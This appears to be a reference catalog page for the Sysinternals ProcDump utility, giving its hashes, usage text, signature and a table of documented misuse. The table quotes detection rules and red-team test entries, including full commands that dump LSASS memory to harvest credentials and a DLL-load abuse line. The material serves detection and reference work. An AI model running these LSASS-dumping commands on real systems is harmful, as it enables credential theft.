procdump.exe

  • File Path: C:\SysinternalsSuite\procdump.exe
  • Description: Sysinternals process dump utility

Hashes

  • MD5: D3763FFBFAF30BCFD866B8ED0324E7A3
  • SHA1: E9967DDB2860174F4FAC3C82A7DCDDFE106AFB25
  • SHA256: 916CC8D6BF2282AE0D2DB587F4F96780AF59E685A1F1A511E0B2B276669DC802
  • SHA384: 6706A10B08E809AEA04D8D3ECFF467B9619ABE1071AAA34ED9DC36C9DF900DECB21A06CD191E50AEFBF42B98033BD026
  • SHA512: 4F14DEE268B0982D620B909C243F61870E56BAB161458BF50F7102207F563D244D100B9CFFA89B271A9CFDFFD2BD1856BDBFCD65DF2EA1EC41AD8638C08C1F55
  • SSDEEP: 12288:RhkYuFNNIYgv1npe39hqdbaoys3Fm7eNMd1MY:RdNEiUoL3Fv81l
  • IMP: 83B075100F8ECC5BF8446EDDD8E9CD6E
  • PESHA1: 7C8C117470D5D611FAF521136703FB1258B315CB
  • PE256: 9E537DE30214983492DB3FC38E5AE52FE32D93CF6DF5C7D6927083983AE08699

Runtime Data

Usage (stdout):


ProcDump v10.0 - Sysinternals process dump utility
Copyright (C) 2009-2020 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

Monitors a process and writes a dump file when the process exceeds the
specified criteria or has an exception.

Capture Usage: 
   procdump.exe [-mm] [-ma] [-mp] [-mc Mask] [-md Callback_DLL] [-mk]
                [-n Count]
                [-s Seconds]
                [-c|-cl CPU_Usage [-u]]
                [-m|-ml Commit_Usage]
                [-p|-pl Counter_Threshold]
                [-h]
                [-e [1 [-g] [-b]]]
                [-l]
                [-t]
                [-f  Include_Filter, ...]
                [-fx Exclude_Filter, ...]
                [-o]
                [-r [1..5] [-a]]
                [-at Timeout]
                [-wer]
                [-64]
                {
                 { {[-w] Process_Name | Service_Name | PID} [Dump_File | Dump_Folder]}
                |
                 {-x Dump_Folder Image_File [Argument, ...]}
                }
Install Usage: 
   procdump.exe -i [Dump_Folder]
                [-mm] [-ma] [-mp] [-mc Mask] [-md Callback_DLL] [-mk]
                [-r]
                [-at Timeout]
                [-k]
                [-wer]
Uninstall Usage: 
   procdump.exe -u

Options:
   -mm     Write a 'Mini' dump file. (default)
           Includes the Process, Thread, Module, Handle and Address Space info.
   -ma     Write a 'Full' dump file.
           Includes All the Image, Mapped and Private memory.
   -mp     Write a 'MiniPlus' dump file.
           Includes all Private memory and all Read/Write Image or Mapped memory.
           To minimize size, the largest Private memory area over 512MB is excluded.
           A memory area is defined as the sum of same-sized memory allocations.
           The dump is as detailed as a Full dump but 10%-75% the size.
           Note: CLR processes are dumped as Full (-ma) due to debugging limitations.
   -mc     Write a 'Custom' dump file.
           Include memory defined by the specified MINIDUMP_TYPE mask (Hex).
   -md     Write a 'Callback' dump file.
           Include memory defined by the MiniDumpWriteDump callback routine
           named MiniDumpCallbackRoutine of the specified DLL.
   -mk     Also write a 'Kernel' dump file.
           Includes the kernel stacks of the threads in the process.
           OS doesn't support a kernel dump (-mk) when using a clone (-r).
           When using multiple dump sizes, a kernel dump is taken for each dump size.

   -a      Avoid outage. Requires -r. If the trigger will cause the target
           to suspend for a prolonged time due to an exceeded concurrent
           dump limit, the trigger will be skipped.
   -at     Avoid outage at Timeout. Cancel the trigger's collection at N seconds.
   -b      Treat debug breakpoints as exceptions (otherwise ignore them).
   -c      CPU threshold above which to create a dump of the process.
   -cl     CPU threshold below which to create a dump of the process.
   -e      Write a dump when the process encounters an unhandled exception.
           Include the 1 to create dump on first chance exceptions.
   -f      Filter (include) on the content of exceptions and debug logging.
           Wildcards (*) are supported.
   -fx     Filter (exclude) on the content of exceptions and debug logging.
           Wildcards (*) are supported.
   -g      Run as a native debugger in a managed process (no interop).
   -h      Write dump if process has a hung window (does not respond to
           window messages for at least 5 seconds).
   -i      Install ProcDump as the AeDebug postmortem debugger.
           Only -mm, -ma, -mp, -mc, -md and -r are supported as additional options.
           Uninstall (-u only) restores the previous configuration.
   -k      Kill the process after cloning (-r), or at end of dump collection.
   -l      Display the debug logging of the process.
   -m      Memory commit threshold in MB at which to create a dump.
   -ml     Trigger when memory commit drops below specified MB value.
   -n      Number of dumps to write before exiting.
   -o      Overwrite an existing dump file.
   -p      Trigger on the specified performance counter when the threshold
           is exceeded. Note: to specify a process counter when there are
           multiple instances of the process running, use the process ID
           with the following syntax: "\Process(<name>_<pid>)\counter"
   -pl     Trigger when performance counter falls below the specified value.
   -r      Dump using a clone. Concurrent limit is optional (default 1, max 5).
           OS doesn't support a kernel dump (-mk) when using a clone (-r).
           CAUTION: a high concurrency value may impact system performance.
           - Windows 7   : Uses Reflection. OS doesn't support -e.
           - Windows 8.0 : Uses Reflection. OS doesn't support -e.
           - Windows 8.1+: Uses PSS. All trigger types are supported.
   -s      Consecutive seconds before dump is written (default is 10).
   -t      Write a dump when the process terminates.
   -u      Treat CPU usage relative to a single core (used with -c).
           As the only option, Uninstalls ProcDump as the postmortem debugger.
   -w      Wait for the specified process to launch if it's not running.
   -wer    Queue the (largest) dump to Windows Error Reporting.
   -x      Launch the specified image with optional arguments. 
           If it is a Store Application or Package, ProcDump will start
           on the next activation (only).
   -64     By default ProcDump will capture a 32-bit dump of a 32-bit process
           when running on 64-bit Windows. This option overrides to create a
           64-bit dump. Only use for WOW64 subsystem debugging.

License Agreement:
   Use the -accepteula command line option to automatically accept the
   Sysinternals license agreement.

Automated Termination:
   -cancel <Target Process PID>
           Using this option or setting an event with the name "ProcDump-<PID>"
           is the same as typing Ctrl+C to gracefully terminate ProcDump.
           Graceful termination ensures the process is resumed if a capture is active.
           The cancellation applies to ALL ProcDump instances monitoring the process.

Filename:
   Default dump filename: PROCESSNAME_YYMMDD_HHMMSS.dmp
   The following substitutions are supported:
           PROCESSNAME   Process Name
           PID           Process ID
           EXCEPTIONCODE Exception Code
           YYMMDD        Year/Month/Day
           HHMMSS        Hour/Minute/Second

Examples:
   Use -? -e to see example command lines.


Loaded Modules:

  • C:\SysinternalsSuite\procdump.exe
  • C:\Windows\SYSTEM32\ntdll.dll
  • C:\Windows\System32\wow64.dll
  • C:\Windows\System32\wow64cpu.dll
  • C:\Windows\System32\wow64win.dll

Signature

  • Status: Signature verified.
  • Serial: 3300000187721772155940C709000000000187
  • Thumbprint: 2485A7AFA98E178CB8F30C9838346B514AEA4769
  • Issuer: CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: procdump
  • Product Name: ProcDump
  • Company Name: Sysinternals - www.sysinternals.com
  • File Version: 10.0
  • Product Version: 10.0
  • Language: English (United States)
  • Legal Copyright: Copyright (C) 2009-2020 Mark Russinovich and Andrew Richards
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/67
  • VirusTotal Link: https://www.virustotal.com/gui/file/916cc8d6bf2282ae0d2db587f4f96780af59e685a1f1a511e0b2b276669dc802/detection/

File Similarity (ssdeep match)

  • C:\SysinternalsSuite\procdump64.exe (score: 57)

Possible Misuse

The following table contains possible examples of procdump.exe being misused. While procdump.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

| Source | Source File | Example | License |
|---|---|---|---|
| sigma | godmode_sigma_rule.yml | - ' -ma ' # ProcDump | DRL 1.0 |
| sigma | godmode_sigma_rule.yml | - ' comsvcs.dll,MiniDump' # Process dumping method apart from procdump | DRL 1.0 |
| sigma | godmode_sigma_rule.yml | - ' comsvcs.dll,#24' # Process dumping method apart from procdump | DRL 1.0 |
| sigma | godmode_sigma_rule.yml | - ' comsvcs.dll MiniDump' # Process dumping method apart from procdump | DRL 1.0 |
| sigma | godmode_sigma_rule.yml | - ' comsvcs.dll #24' # Process dumping method apart from procdump | DRL 1.0 |
| sigma | godmode_sigma_rule.yml | - '.dmp full' # Process dumping method apart from procdump | DRL 1.0 |
| sigma | file_event_win_lsass_dump.yml | - https://www.google.com/search?q=procdump+lsass | DRL 1.0 |
| sigma | file_event_win_lsass_dump.yml | - '\lsass_2' # default format of procdump v9.0 is lsass_YYMMDD_HHmmss.dmp | DRL 1.0 |
| sigma | file_event_win_lsass_memory_dump_file_creation.yml | description: LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified | DRL 1.0 |
| sigma | proc_access_win_lsass_memdump.yml | description: Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up. | DRL 1.0 |
| sigma | proc_access_win_lsass_memdump.yml | - https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html | DRL 1.0 |
| sigma | proc_creation_win_false_sysinternalsuite.yml | - '\procdump.exe' | DRL 1.0 |
| sigma | proc_creation_win_lsass_dump.yml | description: Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials. Identifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials. | DRL 1.0 |
| sigma | proc_creation_win_lsass_dump.yml | Image\|contains: '\procdump' | DRL 1.0 |
| sigma | proc_creation_win_procdump.yml | title: Procdump Usage | DRL 1.0 |
| sigma | proc_creation_win_procdump.yml | description: Detects uses of the SysInternals Procdump utility | DRL 1.0 |
| sigma | proc_creation_win_procdump.yml | - '\procdump.exe' | DRL 1.0 |
| sigma | proc_creation_win_procdump.yml | - Legitimate use of procdump by a developer or administrator | DRL 1.0 |
| sigma | proc_creation_win_procdump_evasion.yml | title: Procdump Evasion | DRL 1.0 |
| sigma | proc_creation_win_procdump_evasion.yml | description: Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved or copied to a different name | DRL 1.0 |
| sigma | proc_creation_win_procdump_evasion.yml | - 'copy procdump' | DRL 1.0 |
| sigma | proc_creation_win_procdump_evasion.yml | - 'move procdump' | DRL 1.0 |
| sigma | proc_creation_win_procdump_evasion.yml | - 'copy lsass.exe_' # procdump default pattern e.g. lsass.exe_220111_085234.dmp | DRL 1.0 |
| sigma | proc_creation_win_procdump_evasion.yml | - 'move lsass.exe_' # procdump default pattern e.g. lsass.exe_220111_085234.dmp | DRL 1.0 |
| sigma | proc_creation_win_procdump_evasion.yml | - Cases in which procdump just gets copied to a different directory without any renaming | DRL 1.0 |
| sigma | proc_creation_win_renamed_procdump.yml | title: Renamed ProcDump | DRL 1.0 |
| sigma | proc_creation_win_renamed_procdump.yml | description: Detects the execution of a renamed ProcDump executable often used by attackers or malware | DRL 1.0 |
| sigma | proc_creation_win_renamed_procdump.yml | - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump | DRL 1.0 |
| sigma | proc_creation_win_renamed_procdump.yml | OriginalFileName: 'procdump' | DRL 1.0 |
| sigma | proc_creation_win_renamed_procdump.yml | - '\procdump.exe' | DRL 1.0 |
| sigma | proc_creation_win_renamed_procdump.yml | - Procdump illegally bundled with legitimate software | DRL 1.0 |
| sigma | proc_creation_win_susp_procdump.yml | title: Suspicious Use of Procdump | DRL 1.0 |
| sigma | proc_creation_win_susp_procdump.yml | description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter ' -ma ' and ' -accepteula' in a single step. This way we're also able to catch cases in which the attacker has renamed the procdump executable. | DRL 1.0 |
| sigma | proc_creation_win_susp_procdump.yml | - Another tool that uses the command line switches of Procdump | DRL 1.0 |
| sigma | proc_creation_win_susp_procdump.yml | - Legitimate use of procdump by a developer or administrator | DRL 1.0 |
| sigma | proc_creation_win_susp_procdump_lsass.yml | title: Suspicious Use of Procdump on LSASS | DRL 1.0 |
| sigma | proc_creation_win_susp_procdump_lsass.yml | description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable. | DRL 1.0 |
| sigma | proc_creation_win_susp_procdump_lsass.yml | - Another tool that uses the command line switches of Procdump | DRL 1.0 |
| sigma | proc_creation_win_susp_system_user_anomaly.yml | - ' -ma ' # ProcDump | DRL 1.0 |
| sigma | proc_creation_win_susp_system_user_anomaly.yml | - 'MiniDump' # Process dumping method apart from procdump | DRL 1.0 |
| LOLBAS | Procdump.yml | Name: Procdump(64).exe | |
| LOLBAS | Procdump.yml | - Command: procdump.exe -md calc.dll explorer.exe | |
| LOLBAS | Procdump.yml | - Command: procdump.exe -md calc.dll foobar | |
| LOLBAS | Procdump.yml | - IOC: Anomalous child processes of procdump | |
| LOLBAS | Procdump.yml | - IOC: Unsigned DLL load via procdump.exe or procdump64.exe | |
| atomic-red-team | index.md | - Atomic Test #2: Dump LSASS.exe Memory using ProcDump [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #10: Create Mini Dump of LSASS.exe using ProcDump [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #2: Dump LSASS.exe Memory using ProcDump [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #10: Create Mini Dump of LSASS.exe using ProcDump [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | For example, on the target host use procdump: | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | * procdump -ma lsass.exe lsass_dump | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | - Atomic Test #2 - Dump LSASS.exe Memory using ProcDump | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | - Atomic Test #10 - Create Mini Dump of LSASS.exe using ProcDump | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | ## Atomic Test #2 - Dump LSASS.exe Memory using ProcDump | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | ProcDump. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | If you see a message saying “procdump.exe is not recognized as an internal or external command”, try using the get-prereq_commands to download and install the ProcDump tool first. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | \| procdump_exe \| Path of Procdump executable \| Path \| PathToAtomicsFolder\T1003.001\bin\procdump.exe\| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | ##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | Invoke-WebRequest “https://download.sysinternals.com/files/Procdump.zip” -OutFile “$env:TEMP\Procdump.zip” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | ## Atomic Test #10 - Create Mini Dump of LSASS.exe using ProcDump | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe | MIT License. © 2018 Red Canary |
| stockpile | 0ef4cc7b-611c-4237-b20b-db36b6906554.yml | name: Leverage Procdump for lsass memory | Apache-2.0 |
| stockpile | 0ef4cc7b-611c-4237-b20b-db36b6906554.yml | $ps_url = "https://download.sysinternals.com/files/Procdump.zip"; | Apache-2.0 |
| stockpile | 0ef4cc7b-611c-4237-b20b-db36b6906554.yml | Expand-Archive -LiteralPath $download_folder"Procdump.zip" -DestinationPath $staging_folder; | Apache-2.0 |
| stockpile | 0ef4cc7b-611c-4237-b20b-db36b6906554.yml | iex $staging_folder"\procdump.exe -accepteula -ma lsass.exe" > $env:APPDATA\error.dmp 2>&1; | Apache-2.0 |
| stockpile | 7a6ba833-de40-466a-8969-5c37b13603e0.yml | "procdump", | Apache-2.0 |

MIT License. Copyright (c) 2020-2021 Strontic.